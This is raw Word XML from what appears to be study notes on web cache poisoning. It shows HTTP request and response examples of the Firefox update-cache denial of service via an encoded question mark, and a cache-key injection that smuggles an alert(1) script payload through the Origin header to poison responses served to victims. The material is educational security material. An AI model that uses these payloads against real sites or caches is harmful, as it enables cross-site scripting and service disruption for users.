    <w:p w14:paraId="4F06CF5F" w14:textId="77777777" w:rsidR="00C825E5" w:rsidRPr="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/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</w:p>
    <w:p w14:paraId="1CCDFE8F" w14:textId="7F691BF5" w:rsidR="00C825E5" w:rsidRPr="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5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</w:t>
      </w:r>
      <w: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/?product=firefox-73.0.1-complete&amp;os=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osx&amp;lang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en-GB&amp;force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=1 HTTP/1.1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download.mozilla.org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HTTP/1.1 301 Found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Location: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00C825E5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  <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://download-installer.cdn.mozilla.net/pub/..firefox-73.mar</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50E42828" w14:textId="35649295" w:rsidR="00C825E5" w:rsidRPr="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5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E583A70" w14:textId="7E6274BF" w:rsidR="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5">
      <w:pPr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If you issue the update request with an encoded question mark, this will upset the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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back-end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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and result in a broken redirect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225AF36" w14:textId="77777777" w:rsidR="00C825E5" w:rsidRPr="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5">
      <w:pPr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</w:p>
    <w:p w14:paraId="6CD1CEDD" w14:textId="2BCC9A39" w:rsidR="00C825E5" w:rsidRPr="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5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 /%3fproduct=firefox-73.0.1-complete&amp;os=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osx&amp;lang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en-GB&amp;force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=1 HTTP/1.1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download.mozilla.org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HTTP/1.1 301 Found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Location: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00C825E5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  <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.mozilla.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02C78FF6" w14:textId="63453460" w:rsidR="00C825E5" w:rsidRPr="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5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70F74580" w14:textId="1ABF6CC8" w:rsidR="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5">
      <w:pPr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But thanks to nginx's URL-decode, it'll have the same cache key as a legitimate update request. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C825E5"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  <w:t xml:space="preserve"> from that point onwards, Firefox will fail to update globally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBCF70B" w14:textId="77777777" w:rsidR="00C825E5" w:rsidRPr="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="001350"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9037C0" w14:textId="385E384A" w:rsidR="00C825E5" w:rsidRPr="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5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GET /?product=firefox-73.0.1-complete&amp;os=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osx&amp;lang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</w:t>
      </w:r>
      <w:proofErr w:type="spell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en-GB&amp;force</w:t>
      </w:r>
      <w:proofErr w:type="spell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=1 HTTP/1.1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Host: download.mozilla.org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HTTP/1.1 301 Found</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="333332"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/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Location: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00C825E5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  <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.mozilla.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EACB01A" w14:textId="77777777" w:rsidR="0065340E" w:rsidRPr="00C825E5" w:rsidRDefault="0065340E" w:rsidP="00C825E5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both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lastRenderedPageBreak/>
        <w:t>Cache key injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5317177C" w14:textId="4ACB040C" w:rsidR="00DA5C48" w:rsidRPr="00C825E5" w:rsidRDefault="0065340E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Keyed components are often bundled together in a string to create the cache key. We can exploit this behavior to craft two different requests having the same cache key.</w:t>
      </w:r>
      <w:r w:rsidR="00234C4C" w:rsidRPr="00C825E5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The following example uses </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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double-underscores</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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to delimit different components in the cache key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA752BE" w14:textId="77777777" w:rsidR="00234C4C" w:rsidRPr="00C825E5" w:rsidRDefault="00234C4C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721C13B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path?param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=123 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FEF2C4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Origin: '-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1)-'__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B4061F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7C5BA096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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C85B6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X-Cache-Key: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path?param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=123__Origin='-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1)-'__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112949F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5E0D7678" w14:textId="20DC7B1E" w:rsidR="0065340E" w:rsidRPr="00C825E5" w:rsidRDefault="0065340E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&lt;script&gt;…'-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1)-'…&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087D0C6" w14:textId="69672549" w:rsidR="0065340E" w:rsidRPr="00C825E5" w:rsidRDefault="0065340E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350E550F" w14:textId="77777777" w:rsidR="00234C4C" w:rsidRPr="00C825E5" w:rsidRDefault="00234C4C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5C51E849" w14:textId="01E1FDBD" w:rsidR="00471707" w:rsidRPr="00C825E5" w:rsidRDefault="0065340E" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/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C825E5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If we induce a victim user to visit the following URL, they would be served the poisoned response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CFF49B" w14:textId="77777777" w:rsidR="00234C4C" w:rsidRPr="00C825E5" w:rsidRDefault="00234C4C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21202465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GET </w:t>
      </w:r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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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path?param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=123__Origin='-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1)-'__</w:t>
      </w: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HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920FF72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31F4A091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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0A096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X-Cache-Key: /</w:t>
      </w:r>
      <w:proofErr w:type="spell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path?param</w:t>
      </w:r>
      <w:proofErr w:type="spell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=123__Origin='-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1)-'__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DD6007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X-Cache: hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB9B598" w14:textId="77777777" w:rsidR="0065340E" w:rsidRPr="00C825E5" w:rsidRDefault="0065340E" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/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465DAD40" w14:textId="76585171" w:rsidR="0065340E" w:rsidRPr="00C825E5" w:rsidRDefault="0065340E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&lt;script&gt;…'-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C825E5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1)-'…&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB23E7" w14:textId="77777777" w:rsidR="0065340E" w:rsidRPr="00C825E5" w:rsidRDefault="0065340E" w:rsidP="00C825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sectPr w:rsidR="0065340E" w:rsidRPr="00C825E5" w:rsidSect="00B35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EC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7526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57A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7F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46FDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6EC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E636D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E7A4A70"/>
    <w:lvl w:ilvl="0" w:tplc="0102248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04263">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="503513667">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="432552285">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1044984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B35E0A"/>
    <w:rsid w:val="00094E81"/>
    <w:rsid w:val="000F2CD3"/>
    <w:rsid w:val="0016188C"/>
    <w:rsid w:val="00234C4C"/>
    <w:rsid w:val="00301903"/>
    <w:rsid w:val="00324136"/>
    <w:rsid w:val="003726BF"/>
    <w:rsid w:val="003A0D70"/>
    <w:rsid w:val="003B394C"/>
    <w:rsid w:val="003D3A28"/>
    <w:rsid w:val="00463905"/>
    <w:rsid w:val="00471707"/>
    <w:rsid w:val="004742D8"/>
    <w:rsid w:val="004755C5"/>
    <w:rsid w:val="00483E3E"/>
    <w:rsid w:val="004A48DA"/>
    <w:rsid w:val="004C5F55"/>
    <w:rsid w:val="004F5791"/>
    <w:rsid w:val="0050227D"/>
    <w:rsid w:val="0050339F"/>
    <w:rsid w:val="0061333D"/>
    <w:rsid w:val="00613C69"/>
    <w:rsid w:val="0065340E"/>
    <w:rsid w:val="0065348F"/>
    <w:rsid w:val="00721E8A"/>
    <w:rsid w:val="00722A86"/>
    <w:rsid w:val="00786EDC"/>
    <w:rsid w:val="007A666B"/>
    <w:rsid w:val="007D7220"/>
    <w:rsid w:val="007E1C26"/>
    <w:rsid w:val="007F07AF"/>
    <w:rsid w:val="00822CDA"/>
    <w:rsid w:val="00870351"/>
    <w:rsid w:val="00876B18"/>
    <w:rsid w:val="008A7EF3"/>
    <w:rsid w:val="008B2F8D"/>
    <w:rsid w:val="008B4F60"/>
    <w:rsid w:val="00941713"/>
    <w:rsid w:val="009530A9"/>
    <w:rsid w:val="009F3EF0"/>
    <w:rsid w:val="00A12C6F"/>
    <w:rsid w:val="00A40A64"/>
    <w:rsid w:val="00A423A5"/>
    <w:rsid w:val="00A52DDD"/>
    <w:rsid w:val="00A83B81"/>
    <w:rsid w:val="00B35E0A"/>
    <w:rsid w:val="00B51A32"/>
    <w:rsid w:val="00B570A9"/>
    <w:rsid w:val="00B67715"/>
    <w:rsid w:val="00C47079"/>
    <w:rsid w:val="00C825E5"/>
    <w:rsid w:val="00C95788"/>
    <w:rsid w:val="00CA41CD"/>
    <w:rsid w:val="00CA6E9C"/>
    <w:rsid w:val="00D0050C"/>
    <w:rsid w:val="00D032F3"/>
    <w:rsid w:val="00D4208C"/>
    <w:rsid w:val="00D8038A"/>
    <w:rsid w:val="00DA5C48"/>
    <w:rsid w:val="00DD022C"/>
    <w:rsid w:val="00DF5964"/>
    <w:rsid w:val="00E11152"/>
    <w:rsid w:val="00E44D77"/>
    <w:rsid w:val="00E452E7"/>
    <w:rsid w:val="00E55BD7"/>
    <w:rsid w:val="00E765E3"/>
    <w:rsid w:val="00E810FF"/>
    <w:rsid w:val="00EB43FC"/>
    <w:rsid w:val="00EE3E91"/>
    <w:rsid w:val="00F63B54"/>
    <w:rsid w:val="00F76FA6"/>
    <w:rsid w:val="00F80379"/>
    <w:rsid w:val="00F86B94"/>
    <w:rsid w:val="00FC28CA"/>
    <w:rsid w:val="00FD6650"/>
    <w:rsid w:val="00F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49A8B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5FD35B4F-00D6-4D99-8DEC-8C71E9B9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yperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD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A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4F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30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D8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927">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="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441996410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nocent-site.com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chebuster.vulnerable-website.com" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mozilla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ozill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-installer.cdn.mozilla.net/pub/..firefox-73.ma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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-22T21:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-27T11:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>